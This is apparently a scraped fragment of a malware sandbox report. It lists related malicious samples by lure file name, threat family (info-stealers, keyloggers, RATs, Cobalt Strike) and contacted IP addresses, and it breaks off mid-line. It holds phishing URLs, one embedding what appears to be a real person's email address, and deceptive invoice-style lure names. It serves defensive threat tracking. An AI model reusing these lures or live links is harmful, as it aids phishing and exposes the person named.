                                                                                                                                                    ModMenu.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    SoftWare(2).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    SimpleLoader v2.1.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 172.67.144.37
                                                                                                                                                    SoftWare(1).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    https://llttfr.boa.ink/?fr=gemma.inglis@heritageportfolio.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.25.14
                                                                                                                                                    2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.96.1
                                                                                                                                                    https://qrsu.io/ONKMxGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.24.14
                                                                                                                                                    PO_L202503042.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.18.186.31
                                                                                                                                                    ORACLE-BMC-31898US2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    QUOTATION_MARQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    QUOTATION_FEBQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    efs.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    category05 sc110-11#U3000_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    8QeI7CboDY.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    y79a2l1FY5.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    miori.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 132.145.140.102
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9ad2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    Order 20201103.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    PO-2513203-PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    QUOTATION_FEBQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    efs.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    Product Order Hirsch 1475.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0e2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    Steam.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exeGet hashmaliciousGhostRat, ValleyRATBrowse
                                                                                                                                                    • 149.154.